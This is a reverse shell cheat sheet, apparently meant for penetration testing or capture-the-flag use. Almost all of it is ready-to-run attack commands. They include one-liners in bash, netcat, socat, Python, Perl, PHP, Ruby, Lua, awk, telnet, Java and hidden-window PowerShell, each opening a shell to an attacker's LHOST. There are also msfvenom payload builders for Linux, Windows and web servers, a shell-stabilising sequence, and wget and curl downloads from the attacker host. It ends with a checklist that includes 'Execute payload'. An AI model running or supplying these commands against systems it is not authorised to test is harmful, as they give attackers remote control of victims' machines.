====================================================
COMMON REVERSE SHELL COMMANDS
====================================================

Replace:
LHOST = Your Attacker IP
LPORT = Your Listening Port

Example:
LHOST=10.10.14.10
LPORT=4444

====================================================
LISTENER
====================================================

nc -lvnp 4444

rlwrap nc -lvnp 4444

socat file:`tty`,raw,echo=0 tcp-listen:4444

====================================================
BASH
====================================================

bash -i >& /dev/tcp/LHOST/LPORT 0>&1

bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

====================================================
SH
====================================================

sh -i >& /dev/tcp/LHOST/LPORT 0>&1

====================================================
NC (Traditional Netcat)
====================================================

nc -e /bin/sh LHOST LPORT

nc -e /bin/bash LHOST LPORT

====================================================
NC (mkfifo Method)
====================================================

rm /tmp/f
mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT > /tmp/f

====================================================
SOCAT
====================================================

socat TCP:LHOST:LPORT EXEC:/bin/sh

socat TCP:LHOST:LPORT EXEC:bash

====================================================
PYTHON 2
====================================================

python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

====================================================
PYTHON 3
====================================================

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

====================================================
PERL
====================================================

perl -e 'use Socket;$i="LHOST";$p=LPORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

====================================================
PHP
====================================================

php -r '$sock=fsockopen("LHOST",LPORT);exec("/bin/sh -i <&3 >&3 2>&3");'

====================================================
RUBY
====================================================

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("LHOST",LPORT);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

====================================================
LUA
====================================================

lua -e "require('socket');require('os');t=socket.tcp();t:connect('LHOST',LPORT);os.execute('/bin/sh -i <&3 >&3 2>&3');"

====================================================
AWK
====================================================

awk 'BEGIN{s="/inet/tcp/0/LHOST/LPORT";while(42){do{printf "shell> " |& s;s |& getline c;if(c){while((c |& getline)>0)print $0 |& s;close(c)}}while(c!="exit")}}'

====================================================
TELNET
====================================================

rm -f /tmp/p
mkfifo /tmp/p
telnet LHOST LPORT 0</tmp/p | /bin/sh 1>/tmp/p

====================================================
JAVA
====================================================

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/LHOST/LPORT;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])

====================================================
POWERSHELL (Windows)
====================================================

powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('LHOST',LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$data=(New-Object Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

====================================================
MSFVENOM PAYLOADS
====================================================

Linux ELF

msfvenom -p linux/x64/shell_reverse_tcp LHOST=LHOST LPORT=LPORT -f elf > shell.elf

Windows EXE

msfvenom -p windows/x64/shell_reverse_tcp LHOST=LHOST LPORT=LPORT -f exe > shell.exe

PHP

msfvenom -p php/reverse_php LHOST=LHOST LPORT=LPORT -f raw > shell.php

ASP

msfvenom -p windows/shell_reverse_tcp LHOST=LHOST LPORT=LPORT -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=LHOST LPORT=LPORT -f raw > shell.jsp

====================================================
UPGRADE TO FULL TTY (Linux)
====================================================

python3 -c 'import pty; pty.spawn("/bin/bash")'

Ctrl+Z

stty raw -echo

fg

reset

export TERM=xterm

stty rows 40 columns 120

====================================================
FILE TRANSFER
====================================================

Attacker

python3 -m http.server 8000

Victim

wget http://LHOST:8000/file

curl http://LHOST:8000/file -o file

====================================================
CHEAT SHEET
====================================================

[ ] Start listener
[ ] Replace LHOST
[ ] Replace LPORT
[ ] Execute payload
[ ] Upgrade TTY
[ ] Stabilize shell